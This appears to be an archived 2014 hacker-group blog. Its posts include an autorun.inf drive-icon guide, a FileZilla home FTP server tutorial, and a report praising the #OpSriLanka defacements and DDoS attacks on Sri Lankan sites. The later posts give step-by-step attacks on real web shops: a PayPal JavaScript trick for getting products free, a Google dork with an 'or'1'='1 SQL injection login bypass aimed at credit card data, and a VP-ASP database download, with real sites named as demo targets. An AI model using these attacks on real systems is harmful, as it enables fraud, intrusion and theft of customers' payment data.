Wednesday, 16 April 2014

How to make the autorun.inf???

                 How to make the autorun.inf???


Autorun.inf is NOT a virus...
This article is about autorun.inf file which is used by most of the viruses and to beat these kind of viruses we can use this same file as a security measure.
let's see how can we do that...



Autorun.inf is a file used to tell windows about what should happen if a specified action takes place in the respective drive.
Example: A virus is programmed to copy itself to a removable media and make an autorun.inf inside the removable drive. The autorun.inf has information that whenever user OPEN the drive the virus should be infected.

But autorun.inf's have various other uses that are quite nice.
Out of which we are going to use:
  1. assigning a drive icon to the drive...(this feature is available in vista)
So here you have to make a custom icon (or copy from other source) for your drive , which should be 16*16 px Or 32*32 px Or 64*64 px etc etc...
you can also use any game's icon if you dont want to make one. you can find there icons in the directory in which they are installed.
For example : I previously used GTA's icon for my games drive. :D

You can use third party software like tune-up utilties to change our drive icons but we will discuss advantage of "this" method later.

How to make the autorun.inf???
  1. 1]first open any text editor (like notepad)
  2. 2]type [autorun] (with square brackets and press enter)
  3. 3]on next line type icon=lovelyicon.ico (where lovelyicon.ico is name of your icon image)
  4. 4]now goto file >> save as >> autorun.inf >> make text documents to all files >> save
The text document should look like below:
*************************************

[autorun]

icon=lovelyicon.ico

*************************************
now copy this autorun.inf file and paste it in all drives...
now copy your icon files , paste it in the drives and rename it to lovelyicon.ico

restart computer.

after restarting You should see the icons for your drives .





But what is the security part ????



we know , no antivirus is perfect !!!
If you got infected by a virus which makes autorun.infs in drives to infect then lets see how you will be alerted...

the process takes place like this...
Virus infected >> he made his own autorun.inf >> hence our autorun.inf got replaced >> our autorun.inf has information to display icons >> that information will be lost >> hence after next restart the icons will be change to default drive icons >> so before opening any of the drives you will be able to know that our autorun.inf is replaced... >> hence you understand "something" is there...



I have problems saving the autorun.inf file !!!


majority of times you may get errors saving files to the drives.
reasons may be:
  1. 1]you are already infected with some viruses which already have created there autorun.infs with read only attributes.
  2. 2]the virus process running in the background may keep replacing our autorun.infs with there ones...
  3. 3]you have a third party software like USB disk security which is preventing it from saving it in drive.
  4. 4]you dont have permissions to write any file in the drive


solutions !!!


one and foremost solution is getting a good and updated antivirus and scan the whole system
After scanning most of the antiviruses delete the virus files but won't delete its autorun.infs.
to delete it manually do the following steps.
open my computer >> goto tools >> folder options >>view >> click show hidden files anduntick hide protected operating system files >> click ok

now we can see the hidden autorun.inf in the drives. go and delete. if you have problems in deleting autorun.inf. download a tool called unlocker from filehippo.com and then delete it through unlocker.

after deleting autorun.inf , hide protected operating system files again...


What are its advantages ???


These types of icons can be achieved through many softwares. These softwares makes some registry changes and display the icons.
advantages of this method:
  1. 1]As this method deals with autorun.inf we get a measure to prevent ourselves from malwares as shown in the whole post.
  2. 2]When we connect our hard drive (as slave) to other OS , our drives retain there icons which cannot be achieved through Third party utilities which use registry changes.
  3. 3]We always get a good feeling when we detects a foreign autorun.inf and we remove it successfully :)

What are its disadvantages ??

As far as I am concerned , the disadvantage is that when you format a drive then the icon of that drive gets lost. No matter a small backup of both files can do a lot.

#opsrilanka - 15th April 2014

#OpSriLanka: Hackers from around the globe launches Cyber war over Sri Lanka, to protest against Tamil Genocide.

Note: Official post -->

Hackers from Around the globe have came up together and launched "#OpSriLanka", Cyber war against Sri Lanka as a protest against the ongoing Tamil Genocide in the country.

Report suggests The Operation was being planned from week's ago and is live from last 2 days, the main course of attack was planned on 15th and 16th of April and this period can be increased said one of the hacker who uses the online handle Shawdowforce - with core crew HusseiN98D and Priority

SriLankan Cyberspace was struck hard there Government should hear us, they should hear to the Voices of Innocent Tamils who they are killing, said one another hacker from Indonesia who participated in the Operation.

A paste released by the "Shawdowforce" who managed the Operation suggests that Representative from more than 13 teams including Anon Ghost -Indian Haxors Team - Indian Cyber Rakshak - RedCult (Lebanon) - Muslim Cyber Corporation(Indonesia) - Pakistan Haxors Crew - Ip Sova Crew(Malaysia) - Indonesian Red Code -Team - Elite Cyber Army (Philippines) - Afghan Cyber Army - Indian Cyber Devils - Sec~Team-7 - Sec_dark took part in the operation.

Some other hackers going with the online handle  Leet Omnicorn - N4ND4 - Gabriel -
 Sri H@xor- Ganes - Eagle Shadoow - Spider64 - Sujit - Akhil Haxor - Justin - Desi Leet - Daksina - Crypted - Glaze were also the part of the operation.

Several Government websites were defaced and others were brought down using DDOS.
more than 100 websites including websites of big Organisations and local business were defaced too.

we hope that this will bring attention of the world on the ongoing Tamil Genocide in SriLanka, and this will teach a lesson to SriLankan Government said one of the Participants. 

Saturday, 12 April 2014

Our Deface Page

Notice:

Welcome to all members of Anonhacksociety

We have successfully made our first deface page
ahsdeface.hpage.com

Visit our page and comment on it, if u like

Sunday, 9 March 2014

Build a Home FTP Server

             Build a Home FTP Server

 

ftp



WHAT IS A FTP SERVER READ MORE HERE


Upload and download files on your home PC from anywhere by turning it into a personal FTP server. With a home FTP server, you can upload and download files on your home hard drive from the office, your friend's house, or to your laptop while you're on the road using any FTP client. Setting up an FTP server may sound like a complicated undertaking only system administrators can handle, but it's actually quite easy and free with open source software FileZilla. You've already heard oFileZilla's FTP client application, but the FileZilla project also offers a server application for Windows. Today we'll build an FTP server on your Windows PC with FileZilla for easy file transfers from any computer.


filezilla



Install the FileZilla FTP Server


The FileZilla server installation is a regular Windows "just press Next" wizard, and for most users, the suggested default settings will work. However, let's take a look at its initial settings anyway, since they'll affect how you work with your server. Here's how to get FileZilla going.

  • Download the File Zilla server application. Even though the FileZilla FTP client is available for multiple operating systems, the server app is Windows-only (and works for Windows XP, Vista and 2000). Download it and kick off the installation wizard. As of this writing, the latest server version is 0.9.25.

  • Run the server as a Windows Service. First FileZilla will give you the option of how it should start up: as a Windows service or not, automatically or manually. Windows services are processes that run on your PC which you can manage from the Services management pane. There's more on how to manage that below, but at this point, running FileZilla as a Windows service that runs automatically is the default option. If you want your FTP server on by default, choose "Start as service, started automatically (default)" as shown. Otherwise, choose "Start as service, started manually."

filezilla+1



In this pane you'll also set the port for the admin interface to use. By default it's 14147, and you're most likely safe leaving it at that. If you do change that port number, make a note of what it is—you'll need it to connect to the server later on.


  • Set the server administrative interface to launch automatically (or not). On the final installation dialog, choose whether you want the server admin window to launch automatically when the current Windows user logs on, when any user logs on, or if it should be started manually.

  • Run and connect to the server with the admin interface. As the installation wizard completes, set it to start the server admin interface. This is the window where you'll configure your server and monitor its activity. The first time you run the admin interface, it will ask you for the server's address and port. Since the server is running on your PC—the same one the admin interface is running on—its address is

filezilla+2


Or,


filezilla+3


The default port is 14147 (or whatever you may have changed it to, as noted above), as shown:


filezilla+4



If this is the only FTP server you'll be administering (most likely it is), check off the "Always connect to this server" box to bypass this dialog in the future.


Create Server Users


If all's gone well, your server's up and running—but no one can use it yet, since you haven't given anyone permission. To set up a server user, from the Edit menu choose Users. In the Users dialog on the right hand side, hit the Add button to create a new user and assign a password. Then, on the left side, select "Shared Folders" to set what folders that user will have access to on your server. Here I've created a user named gina and granted read access to the


filezilla+5


directory.


Note you can fine-tune file access rights for each user: grant read-only rights (download only), write rights (to upload files), and whether or not the user can delete files or create directories, too.


filezilla+6


If you want to grant several users access to your server all with the same rights and directory access, instead of creating each one individually, set up a user group. For example, if you're sharing your MP3 directory with friends, make a user group called "music fans" with access to the correct directory and add users to that group, which automatically gives them those rights. Then, if you move your music directory you only have to edit the group, not each user in it. To manage user groups, from the Edit menu, choose Groups.


Log into the Server


Now that the server's up and running with users, it's time to log in and try uploading and downloading. Using any FTP client (like the FileZilla client or FireFTP for Firefox) enter the server address, user name and password.


Server address If you're FTP'ing across your home network (like from your upstairs PC to your bedroom PC), you can reach the server by using its internal network address (most likely something like)


filezilla+7


From the command line, type

filezilla+8


to see what that address is. If you want to log into your FTP server over the internet, set up a memorable URL for it and allow connections from outside your network. 

User name and password This is one of the users you set up in FileZilla's admin interface, not the server admin user name. If friends, family, and co-workers will be logging into your FTP server, give them each a their specific username and password to log in (along with the server address.)

Use your FTP server to fetch files stored at home from anywhere, share files with friends and family, or back up files across your network. (Free backup software SyncBack supports backup over FTP.



AT Last I Would Like To Say Few Words About Its Security 

FTP is not a secure protocol; all the file transfers happen in the clear, which makes them ripe for sniffing. FileZilla does support encrypted FTP access, and we recommend using that or a VPN like Hamachi to secure file transfers over the internet. FileZilla's secure FTP server setup is beyond the scope of this article, but you can go into the server admin interface's settings area to configure it.

 

Saturday, 8 March 2014

Paypal Javascript Exploit

                         Paypal Javascript Exploit


Here is a simple JavaScript exploit through which you can hack Paypal & download products for free without spending single penny . More then 500 sites are Vulnerable !! .










Step by Step Guide :


  • Go to the vulnerable site & paste the below JavaScript given below in the browser & hit enter ! .


javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);



  • So after you have hit enter, just sit back & enjoy the free product . 

Live Demo :~#


So after you paste the JavaScript in the URL then the product will be automatically downloaded :)



More Vulnerable sites link - http://pastebin.com/nLuSZb9J  (some sites are patched)

So as you all know that its will contain many details .But remember you can go behind the bars for this . Its a big Crime .We have provided this Tutorial to make all of you aware of such hacks 

Admin Page Vulnerability | Hacking Credit Card

         

Admin Page Vulnerability | Hacking Credit Card


Here is the second part of Hacking Credit Card . Another easy & working Exploit .







Step By Step Guide :~#
  • Go to Google & type this Dork  -  inurl:\"/cart.php?m=\"
  • After that the Target URL will look like -   http://www.facesbyfelicia.com/store/cart.php?m=view (Demo) .
  • Then now we will find the admin page & hack into the website so we will modify the URL to find the Admin page 


Now you will be asked username & password so write this -
Username - 'or'1'='1
Password - 'or'1'='1

So as you all know that its will contain many credit card details as its a shopping site !But remember you can go behind the bars for this . Its a big Crime .We have provided this Tutorial to make all of you aware of such hacks .

VP-ASP Shopping Cart 5.00 Exploit

                  VP-ASP Shopping Cart 5.00 Exploit 



Here is a small exploit to Hack & Steal Credit card info & many other data from a site .







Step By Step Guide :~#



  • Go to Google & type this Dork  - intitle: VP-ASP Shopping Cart 5.00 l
  • After that the Target URL will look like -  www.tcsprogramming.net/shopping/diag_dbtest.asp  (Demo)
  • Then there you can see many details like xDatabase xDatabas Location xEmail & Many others  so the thing we have to do here site get the Database of that particular Website .
  • To get the database we will modify the URL 

Live Demo :

Target - www.tcsprogramming.net/shopping/diag_dbtest.asp
Exploit - http://www.tcsprogramming.net/shopping/shopping550.mdb

So here we have exploited the database  to get all the data of the website  . Just Replace the diag_dbtest.asp to shopping/shopping550.mdb (xDatabase) .

The world have changed a lot, people have changed a lot

To be continued ...